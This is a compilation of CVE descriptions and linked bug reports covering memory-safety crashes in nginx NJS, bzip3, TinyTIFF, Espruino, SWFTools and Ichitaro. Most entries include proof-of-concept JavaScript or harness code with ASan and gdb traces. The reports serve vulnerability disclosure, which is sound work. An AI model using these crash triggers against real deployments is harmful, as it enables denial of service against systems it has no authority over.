Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

ret2ddme opened this issue

Feb 21, 2023

· 0 comments

**Comments**

Environment

    commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
    version: 0.7.10
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Poc

Object.defineProperty(\[\], 'a', { configurable: true, enumerable: true, get: Object});

Asan

    ==31165==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000022 (pc 0x00000053426f bp 0x7ffef5d7b170 sp 0x7ffef5d7a3e0 T0)
    ==31165==The signal is caused by a READ memory access.
    ==31165==Hint: address points to the zero page.
        #0 0x53426f in njs_dump_is_recursive /root/njs/src/njs_json.c
        #1 0x53426f in njs_vm_value_dump /root/njs/src/njs_json.c:2113:13
        #2 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
        #3 0x4c984b in njs_console_output /root/njs/src/njs_shell.c:885:13
        #4 0x4cd050 in njs_process_output /root/njs/src/njs_shell.c:1010:9
        #5 0x4cad81 in njs_process_script /root/njs/src/njs_shell.c:960:5
        #6 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
        #7 0x4c94be in main /root/njs/src/njs_shell.c:335:15
        #8 0x7f1864672c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #9 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_json.c in njs_dump_is_recursive
    

2 participants

CVE-2023-27728: SEGV src/njs_json.c in njs_dump_is_recursive · Issue #618 · nginx/njs

Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_function_frame at src/njs_function.h.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

ret2ddme opened this issue

Feb 21, 2023

· 0 comments

**Comments**

Environment

    commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
    version: 0.7.10
    Build   : 
         ./configure --cc=clang --address-sanitizer=YES     
         make
    

Poc

const v1 \= EvalError(EvalError);
Object.defineProperty(v1, "message", { configurable: true, set: EvalError });
delete v1.message;
EvalError(v1);

Asan

    ==31577==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000030 (pc 0x00000053ee4e bp 0x7ffc9539f0f0 sp 0x7ffc9539f0d0 T0)
    ==31577==The signal is caused by a READ memory access.
    ==31577==Hint: address points to the zero page.
        #0 0x53ee4e in njs_function_frame /root/njs/src/njs_function.h:155:9
        #1 0x53ee4e in njs_function_call2 /root/njs/src/njs_function.c:508:11
        #2 0x51f100 in njs_function_apply /root/njs/src/njs_function.h:192:12
        #3 0x51f100 in njs_object_property /root/njs/src/njs_object_prop.c:138:12
        #4 0x553f76 in njs_error_to_string2 /root/njs/src/njs_error.c:619:11
        #5 0x55528d in njs_error_prototype_to_string /root/njs/src/njs_error.c:682:12
        #6 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
        #7 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
        #8 0x53ee73 in njs_function_call2 /root/njs/src/njs_function.c:513:12
        #9 0x4d5b96 in njs_function_apply /root/njs/src/njs_function.h:192:12
        #10 0x4d5b96 in njs_value_to_primitive /root/njs/src/njs_value.c:167:23
        #11 0x554976 in njs_value_to_string /root/njs/src/njs_value_conversion.h:189:19
        #12 0x554976 in njs_error_constructor /root/njs/src/njs_error.c:309:19
        #13 0x53ff0a in njs_function_native_call /root/njs/src/njs_function.c:645:11
        #14 0x53ef49 in njs_function_frame_invoke /root/njs/src/njs_function.c:692:16
        #15 0x4e77c2 in njs_vmcode_interpreter /root/njs/src/njs_vmcode.c:1512:15
        #16 0x4de86a in njs_vm_start /root/njs/src/njs_vm.c:553:11
        #17 0x4cad73 in njs_process_script /root/njs/src/njs_shell.c:952:19
        #18 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
        #19 0x4c94be in main /root/njs/src/njs_shell.c:335:15
        #20 0x7f4f0bc58c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #21 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_function.h:155:9 in njs_function_frame
    

2 participants

CVE-2023-27727: SEGV src/njs_function.h:155:9 in njs_function_frame · Issue #617 · nginx/njs

** DISPUTED ** An issue was discovered in libbzip3.a in bzip3 1.2.2. There is a bz3_decompress out-of-bounds read in certain situations where buffers passed to bzip3 do not contain enough space to be filled with decompressed data. NOTE: the vendor's perspective is that the observed behavior can only occur for a contract violation, and thus the report is invalid.

bz3_compress crashes because out is a null pointer. it was improperly called. once again I have to show you the stack trace:

    Program received signal SIGSEGV, Segmentation fault.
    __memcpy_avx_unaligned_erms ()
        at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:710
    710	../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
    (gdb) bt
    #0  __memcpy_avx_unaligned_erms ()
        at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:710
    #1  0x000055555556245f in bz3_decompress (in=<optimized out>,
        in@entry=0x555555568498 "BZ3v1", out=out@entry=0x0,
        in_size=<optimized out>, in_size@entry=31,
        out_size=out_size@entry=0x7fffffffe448) at ../src/libbz3.c:908
    #2  0x000055555555525a in main (argc=<optimized out>,
        argv=0x7fffffffe588) at decompress-file.c:28
    

notice: out=out@entry=0x0, out_size=out_size@entry=0x7fffffffe448). The size of the output is large, hence malloc failed. when malloc inside of decompress-file fails, it returns null. the memory under null is not big enough for us to be able to write 0x7fffffffe448 into, hence it is not the library's fault. it is a problem with decompress-file.c not being robust enough.

it is impossible to determine whether the buffer passed to bz3_decompress will even contain enough bytes for the output, which is why we pass out_size to it. but the decompress-file.c program clearly lied to the API, and there is no way in portable C to check it. you would have to use malloc_get_usable_size:

     0 [14:55] Desktop/workspace/bzip3@master % cd examples                            22s
     0 [14:55] workspace/bzip3@master/examples % gcc decompress-file.c -o decompress-file -O3 -lbzip3
     0 [14:55] workspace/bzip3@master/examples % ./decompress-file ~/Desktop/6.crashes.bz3 6.crashes
    zsh: segmentation fault  ./decompress-file ~/Desktop/6.crashes.bz3 6.crashes
     139 [14:55] workspace/bzip3@master/examples % ./decompress-file ~/Desktop/6.crashes.bz3 6.crashes
    zsh: segmentation fault  ./decompress-file ~/Desktop/6.crashes.bz3 6.crashes
     139 [14:55] workspace/bzip3@master/examples % gdb -q decompress-file
    Reading symbols from decompress-file...
    (No debugging symbols found in decompress-file)
    (gdb) set args ~/Desktop/6.crashes.bz3 6.crashes
    (gdb) run
    Starting program: /home/palaiologos/Desktop/workspace/bzip3/examples/decompress-file ~/Desktop/6.crashes.bz3 6.crashes
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Program received signal SIGSEGV, Segmentation fault.
    __memcpy_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:710
    710	../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
    (gdb) bt
    #0  __memcpy_avx_unaligned_erms ()
        at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:710
    #1  0x00007ffff7fb8cbc in bz3_decompress (in=0x55555555a4a5 "\n", out=0x0,
        in_size=<optimized out>, out_size=0x7fffffffe4c8) at src/libbz3.c:908
    #2  0x000055555555518a in main ()
    (gdb)
    

notice: out_size=x7fffffffe4c8, out=0x0

CVE-2023-29417: heap-buffer-overflow in bz3_decompress() · Issue #97 · kspalaiologos/bzip3

A use-after-free vulnerability exists within the way Ichitaro Word Processor 2022, version 1.0.1.57600, processes protected documents. A specially crafted document can trigger reuse of freed memory, which can lead to further memory corruption and potentially result in arbitrary code execution. An attacker can provide a malicious document to trigger this vulnerability.

CVE-2022-43664: TALOS-2022-1673 || Cisco Talos Intelligence Group

Buffer Overflow vulnerability found in tinyTIFF v.3.0 allows a local attacker to cause a denial of service via the TinyTiffReader_readNextFrame function in tinytiffreader.c file.

**Project Address**

https://github.com/jkriege2/TinyTIFF

**Security Issue Report**

A global-buffer-overflow issue was discovered in TinyTIFF in tinytiffreader.c file. The flow allows an attacker to cause a denial of service (abort) via a crafted file.

**OS information**

    ubuntu@ubuntu:~/Documents/TinyTIFF/src$ uname -a
    Linux ubuntu 5.15.0-58-generic #64~20.04.1-Ubuntu SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    

**Summary**

AddressSanitizer: global-buffer-overflow (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6) in \_\_asan\_memcpy

**Problem Code location**

        #0 0x4969c6 in __asan_memcpy (/home/ubuntu/Desktop/TinyTIFF/src/asan_tinytiffreader+0x4969c6)
        #1 0x4cdff4 in TinyTIFFReader_readNextFrame /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c
        #2 0x4cb3e9 in TinyTIFFReader_open /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:921:9
        #3 0x4d10ea in main /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:1058:10
        #4 0x7ffff7c4a082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #5 0x41c3bd in _start (/home/ubuntu/Desktop/TinyTIFF/src/asan_tinytiffreader+0x41c3bd)
    

Poc file: id8

asan\_tinytiffreader

**compile the test case in the source**

cd TinyTIFF/
cmake .
make -j4
cd src/

modified the tinytiffreader.c file, add harness

int main(int argc, char \*argv\[\]){
       TinyTIFFReaderFile\* tiffr=NULL;
   tiffr=TinyTIFFReader\_open(argv\[1\]); 
   if (!tiffr) { 
	   printf("ERROR reading (not existent, not accessible or no TIFF file)\\n");
   } else { 
        const uint32\_t width=TinyTIFFReader\_getWidth(tiffr); 
        const uint32\_t height=TinyTIFFReader\_getHeight(tiffr);
        const uint16\_t bitspersample=TinyTIFFReader\_getBitsPerSample(tiffr, 0);		
        uint8\_t\* image=(uint8\_t\*)calloc(width\*height, bitspersample/8);  
        TinyTIFFReader\_getSampleData(tiffr, image, 0); 

	printf("%ld\\n",width);
        printf("%ld\\n",height);
        printf("%u\\n",bitspersample);

							///////////////////////////////////////////////////////////////////
							// HERE WE CAN DO SOMETHING WITH THE SAMPLE FROM THE IMAGE 
							// IN image (ROW-MAJOR!)
							// Note: That you may have to typecast the array image to the
							// datatype used in the TIFF-file. You can get the size of each
							// sample in bits by calling TinyTIFFReader\_getBitsPerSample() and
							// the datatype by calling TinyTIFFReader\_getSampleFormat().
							///////////////////////////////////////////////////////////////////
                
        free(image); 
    } 
    TinyTIFFReader\_close(tiffr); 

}

then,complie the tinytiffreader.c

gcc -o tinytiffreader tinytiffreader.c

test with poc

this program will trigger global-buffer-overflow crash. The asan complie program is asan\_tinytiffreader.

**ASAN Report:**

ubuntu@ubuntu:~/Desktop/TinyTIFF/src$ ./asan\_tinytiffreader out/default/crashes/id\\:000008\\,sig\\:11\\,src\\:000016+000007\\,time\\:306221\\,execs\\:34950\\,op\\:splice\\,rep\\:16 
=================================================================
==3817392==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000004e82c3 at pc 0x0000004969c7 bp 0x7fffffffd890 sp 0x7fffffffd058
READ of size 2082441480 at 0x0000004e82c3 thread T0
    #0 0x4969c6 in \_\_asan\_memcpy (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6)
    #1 0x4cdff4 in TinyTIFFReader\_readNextFrame /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c
    #2 0x4cb3e9 in TinyTIFFReader\_open /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:921:9
    #3 0x4d10ea in main /home/ubuntu/Desktop/TinyTIFF/src/tinytiffreader.c:1058:10
    #4 0x7ffff7c4a082 in \_\_libc\_start\_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
    #5 0x41c3bd in \_start (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x41c3bd)

0x0000004e82c3 is located 61 bytes to the left of global variable '<string literal>' defined in 'tinytiffreader.c:653:13' (0x4e8300) of size 62
0x0000004e82c3 is located 0 bytes to the right of global variable '<string literal>' defined in 'tinytiffreader.c:214:32' (0x4e82c0) of size 3
  '<string literal>' is ascii string 'rb'
SUMMARY: AddressSanitizer: global-buffer-overflow (/home/ubuntu/Desktop/TinyTIFF/src/asan\_tinytiffreader+0x4969c6) in \_\_asan\_memcpy
Shadow bytes around the buggy address:
  0x000080095000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x000080095040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=\>0x000080095050: 00 00 00 00 00 00 00 00\[03\]f9 f9 f9 f9 f9 f9 f9
  0x000080095060: 00 00 00 00 00 00 00 06 f9 f9 f9 f9 00 00 00 00
  0x000080095070: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 07
  0x000080095080: f9 f9 f9 f9 00 00 00 00 00 00 00 03 f9 f9 f9 f9
  0x000080095090: 00 00 00 00 00 03 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800950a0: 00 00 00 02 f9 f9 f9 f9 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3817392==ABORTING

**use gdb debug this crah**

ubuntu@ubuntu:~/Documents/TinyTIFF/src$ gdb --args ./tinytiffreader id8
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html\>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86\_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/\>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/\>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./tinytiffreader...
(No debugging symbols found in ./tinytiffreader)
gdb-peda$ r id8
Starting program: /home/ubuntu/Documents/TinyTIFF/src/tinytiffreader id8

Program received signal SIGSEGV, Segmentation fault.
\[----------------------------------registers-----------------------------------\]
RAX: 0x7ffdfdd09010 --\> 0x0 
RBX: 0x55555555b2a0 --\> 0x55555555b720 --\> 0xfbad2488 
RCX: 0x0 
RDX: 0x1fa0b8878 
RSI: 0x0 
RDI: 0x7ffdfdd09010 --\> 0x0 
RBP: 0x7fffffffdcd0 --\> 0x7fffffffdda0 --\> 0x7fffffffdef0 --\> 0x7fffffffdf30 --\> 0x0 
RSP: 0x7fffffffdca8 --\> 0x555555555663 (<TinyTIFFReader\_memcpy\_s+51>:	mov    eax,0x0)
RIP: 0x7ffff7f4d8f5 (<\_\_memmove\_avx\_unaligned\_erms+533>:	vmovdqu ymm4,YMMWORD PTR \[rsi\])
R8 : 0x7ffdfdd09010 --\> 0x0 
R9 : 0x0 
R10: 0x22 ('"')
R11: 0x246 
R12: 0x555555555240 (<\_start\>:	endbr64)
R13: 0x7fffffffe020 --\> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
\[-------------------------------------code-------------------------------------\]
   0x7ffff7f4d8ec <\_\_memmove\_avx\_unaligned\_erms+524>:	vmovdqu YMMWORD PTR \[r11\],ymm4
   0x7ffff7f4d8f1 <\_\_memmove\_avx\_unaligned\_erms+529>:	vzeroupper 
   0x7ffff7f4d8f4 <\_\_memmove\_avx\_unaligned\_erms+532>:	ret    
=\> 0x7ffff7f4d8f5 <\_\_memmove\_avx\_unaligned\_erms+533>:	vmovdqu ymm4,YMMWORD PTR \[rsi\]
   0x7ffff7f4d8f9 <\_\_memmove\_avx\_unaligned\_erms+537>:	vmovdqu ymm5,YMMWORD PTR \[rsi+0x20\]
   0x7ffff7f4d8fe <\_\_memmove\_avx\_unaligned\_erms+542>:	vmovdqu ymm6,YMMWORD PTR \[rsi+0x40\]
   0x7ffff7f4d903 <\_\_memmove\_avx\_unaligned\_erms+547>:	vmovdqu ymm7,YMMWORD PTR \[rsi+0x60\]
   0x7ffff7f4d908 <\_\_memmove\_avx\_unaligned\_erms+552>:	vmovdqu ymm8,YMMWORD PTR \[rsi+rdx\*1-0x20\]
\[------------------------------------stack-------------------------------------\]
0000| 0x7fffffffdca8 --\> 0x555555555663 (<TinyTIFFReader\_memcpy\_s+51>:	mov    eax,0x0)
0008| 0x7fffffffdcb0 --\> 0x1fa0b8878 
0016| 0x7fffffffdcb8 --\> 0x0 
0024| 0x7fffffffdcc0 --\> 0x1fa0b8878 
0032| 0x7fffffffdcc8 --\> 0x7ffdfdd09010 --\> 0x0 
0040| 0x7fffffffdcd0 --\> 0x7fffffffdda0 --\> 0x7fffffffdef0 --\> 0x7fffffffdf30 --\> 0x0 
0048| 0x7fffffffdcd8 --\> 0x5555555563fb (<TinyTIFFReader\_readNextFrame+886>:	jmp    0x555555556683 <TinyTIFFReader\_readNextFrame+1534>)
0056| 0x7fffffffdce0 --\> 0x0 
\[------------------------------------------------------------------------------\]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
\_\_memmove\_avx\_unaligned\_erms () at ../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S:436
436	../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.

you can see "../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.", I think this problem is caused by abnormal references to Pointers, See this link.This one bug I tested on multiple systems crashed.

CVE-2023-26733: Security-Issue-Report-of-TinyTIFF/README.md at main · 10cksYiqiyinHangzhouTechnology/Security-Issue-Report-of-TinyTIFF

Buffer Overflow vulnerability found in Espruino 2v05.41 allows an attacker to cause a denial of service via the function jsvGarbageCollectMarkUsed in file src/jsvar.c.

Hello,  
I found that IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed . When Object property name is marked ，it will be regarfed as nativeStr struct. And read content pointed by property name and marked，which will result arbitrary memory write.  
Please confirm~~  
poc is here:  
espruino1.js.zip

test version:  
commit d543731 (HEAD -> master, origin/master, origin/HEAD) (20200505)

environment

gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0  
run ./espruino poc  
(gdb) r  
Starting program: /home/zdz/Espruino/espruino /home/zdz/debugBug/espruino1.js  
\[Thread debugging using libthread\_db enabled\]  
Using host libthread\_db library "/lib/x86\_64-linux-gnu/libthread\_db.so.1".  
\[New Thread 0x7ffff6e85700 (LWP 4410)\]

| |\_ \_\_\_ \_\_\_ \_ ||\_\_\_ \_\_\_  
| | -| . | | | | | | . |  
||| || |||||\_|  
|| espruino.com  
2v05.41 (c) 2019 G.Williams

Espruino is Open Source. Our work is supported  
only by sales of official boards and donations:  
http://espruino.com/Donate

{ }

Thread 1 "espruino" received signal SIGSEGV, Segmentation fault.  
jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
73 bool jsvIsString(const JsVar \*v) { return v && (v->flags&JSV\_VARTYPEMASK)>=\_JSV\_STRING\_START && (v->flags&JSV\_VARTYPEMASK)<=\_JSV\_STRING\_END; } ///< String, or a NAME too  
(gdb) bt  
#0 jsvIsString (  
v=<error reading variable: Cannot access memory at address 0x7fffff7feff0>) at src/jsvar.c:73  
#1 0x0000555555565728 in jsvHasCharacterData (v=0x7ffff6644610)  
at src/jsvar.c:384  
#2 0x000055555556f8d2 in jsvGarbageCollectMarkUsed (var=0x7ffff6644610)  
at src/jsvar.c:3715  
#3 0x000055555556f97a in jsvGarbageCollectMarkUsed (var=0x7ffff6644650)  
at src/jsvar.c:3730  
#4 0x000055555556f9cb in jsvGarbageCollectMarkUsed (var=0x7ffff6644670)  
at src/jsvar.c:3738

Dongzhuo Zhao working with ADLab of Venustech

CVE-2020-23257: IIlegal memory access may lead to arbitrary memory write inside jsvGarbageCollectMarkUsed  · Issue #1820 · espruino/Espruino

SWFTools v0.9.2 was discovered to contain a stack-use-after-scope in the swf_ReadSWF2 function in lib/rfxswf.c.

    ==13979==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7ffd30700648 at pc 0x000000581b59 bp 0x7ffd30700550 sp 0x7ffd30700548
    READ of size 4 at 0x7ffd30700648 thread T0
        #0 0x581b58 in swf_ReadSWF2 /home/swftools//lib/rfxswf.c:1607:18
        #1 0x581f8d in swf_ReadSWF /home/swftools/lib/rfxswf.c:1627:10
        #2 0x4f9aaa in main /home/swftools/src/swfdump.c:1177:12
        #3 0x7f9dd2219c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #4 0x41bcb9 in _start (/home/swftoolssrc/swfdump+0x41bcb9)
    
    Address 0x7ffd30700648 is located in stack of thread T0 at offset 232 in frame
        #0 0x580ccf in swf_ReadSWF2 /home/swftools/lib/rfxswf.c:1561
    
      This frame has 3 object(s):
        [32, 64) 'b' (line 1565)
        [96, 152) 't1' (line 1568)
        [192, 240) 'zreader' (line 1569) <== Memory access at offset 232 is inside this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-use-after-scope /home/swftools/lib/rfxswf.c:1607:18 in swf_ReadSWF2
    Shadow bytes around the buggy address:
      0x1000260d8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000260d8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000260d8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000260d80a0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x1000260d80b0: f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f2
    =>0x1000260d80c0: f2 f2 f2 f2 f8 f8 f8 f8 f8[f8]f3 f3 f3 f3 f3 f3
      0x1000260d80d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000260d80e0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x1000260d80f0: 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 00 00 00 00
      0x1000260d8100: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
      0x1000260d8110: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f2 f2 f2 f8 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==13979==ABORTING

CVE-2023-26991: stack-use-after-scope exists in function swf_ReadSWF2 in lib/rfxswf.c · Issue #196 · matthiaskramm/swftools

Buffer Overflow found in Nginx NJS allows a remote attacker to execute arbitrary code via the njs_object_property parameter of the njs/njs_vm.c function.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)  
built with ASAN on

**bug**

\> (1..\_\_proto\_\_.length \= '1', Array.prototype.slice.call(1, 0, 2)).toString()
ASAN:SIGSEGV
\===\=\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\===\=
\==13918\==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000407181 bp 0x7ffdf2511450 sp 0x7ffdf2511430 T0)
    #0 0x407180 in nxt\_lvlhsh\_find nxt/nxt\_lvlhsh.c:181
    #1 0x4479b7 in njs\_object\_property njs/njs\_object\_property.c:757
    #2 0x4210c2 in njs\_primitive\_value njs/njs\_vm.c:2987
    #3 0x4206ec in njs\_vmcode\_string\_argument njs/njs\_vm.c:2864
    #4 0x41473f in njs\_vmcode\_interpreter njs/njs\_vm.c:159
    #5 0x412c4e in njs\_vm\_start njs/njs.c:594
    #6 0x404a75 in njs\_process\_script njs/njs\_shell.c:771
    #7 0x40387b in njs\_interactive\_shell njs/njs\_shell.c:501
    #8 0x402ad1 in main njs/njs\_shell.c:271

njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution.

emmmm, but i think this may cause at least cpde execution, if u can control the js it executed.Maybe LPE?

…

\---Original--- From: "Valentin V. Bartenev"<notifications@github.com> Date: Wed, Jul 3, 2019 15:53 PM To: "nginx/njs"<njs@noreply.github.com>; Cc: "Author"<author@noreply.github.com>;"lokihardt"<nine.twelve@foxmail.com>; Subject: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) njs scripts have no remote access, so the attacker can't control them and thus it's not a remote code execution. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or mute the thread.

@l0kihardt

njs is used for nginx configuration and is not an application server. njs **only** executes js code from a static file which is a part of nginx config file (which **must** be trusted source anyway).

@l0kihardt If you can control njs script on a server, then you already have a root access and can control the whole server without any bugs needed.

 xeioex changed the title Logic problems happen in the nxt\_lvlhsh.c Array elements left uninitialized in Array.prototype.slice() for primitive this values.

Jul 3, 2019

Yeah sure, I use ubuntu 18.04, and did something like this \`\`\` export CC=clang export CFLAGS=-fsanitize=address ./configure make \`\`\`

…

\------------------ 原始邮件 ------------------ 发件人: "Dmitry Volyntsev"<notifications@github.com>; 发送时间: 2019年7月3日(星期三) 下午4:07 收件人: "nginx/njs"<njs@noreply.github.com>; 抄送: "3087136937"<nine.twelve@foxmail.com>;"Mention"<mention@noreply.github.com>; 主题: Re: \[nginx/njs\] Logic problems happen in the nxt\_lvlhsh.c (#188) @l0kihardt please, also share the way you run your POC. Cannot reproduce it (with ASAN enabled). $ cat github188.js var \_export = 1; \_export.\_\_proto\_\_.length= \_export.\_\_proto\_\_.sum = \[1\].slice Error(\_export.sum((\_export.\_\_proto\_\_.length= \[1\].toString(RegExp(Error()))) ===('loading exception'))) //export default \_export; \_export; console.log(\_export) $ ./build/njs github188.js 1 — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub, or mute the thread.

CVE-2020-19695: Array elements left uninitialized in Array.prototype.slice() for primitive this values. · Issue #188 · nginx/njs

Buffer Overflow vulnerabilty found in Nginx NJS v.0feca92 allows a remote attacker to execute arbitrary code via the njs_module_read in the njs_module.c file.

**env**

ubuntu 18.04  
njs 0feca92  
gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)

**bug**

So, actually this is a logic bug, happened under an really interesting circumstance.  
the buggy function is the njs\_module\_read in the file njs\_module.c

if (fstat(fd, &sb) == -1) {
        goto fail;
    }

    text->length = nxt\_length(NJS\_MODULE\_START);

    if (S\_ISREG(sb.st\_mode) && sb.st\_size) {
        text->length += sb.st\_size;
    }

    text->length += nxt\_length(NJS\_MODULE\_END);

    text->start = nxt\_mp\_alloc(vm->mem\_pool, text->length);
    if (text->start == NULL) {
        goto fail;
    }

    p = nxt\_cpymem(text->start, NJS\_MODULE\_START, nxt\_length(NJS\_MODULE\_START));

    n = read(fd, p, sb.st\_size);

as you can see, it read the sb.st\_size and sb.st\_mode with function fstat. However if we dont provide a common .js file. the S\_ISREG(sb.st\_mode) will be 0. text->length wont be updated.  
and read(fd, p, sb.st\_size); still read sb.st\_size bytes into the p. p is on the heap. So we can overflow to the next chunk on the heap....

**poc**

CVE-2020-19692: Heap based buffer overflow in njs_module.c · Issue #187 · nginx/njs

Digging through manuals for security cameras, a group of gearheads found sinister details and ignited a new battle in the US-China tech war.

Tag

#c++